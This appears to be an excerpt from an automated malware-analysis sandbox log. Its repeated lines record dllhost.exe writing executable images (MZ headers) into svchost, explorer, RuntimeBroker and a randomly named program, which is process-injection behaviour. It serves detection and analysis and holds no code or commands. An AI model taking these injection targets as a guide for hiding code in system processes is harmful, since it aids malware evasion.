Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C4C590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DCCA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 14D83F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 14D83F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B927020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B927050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
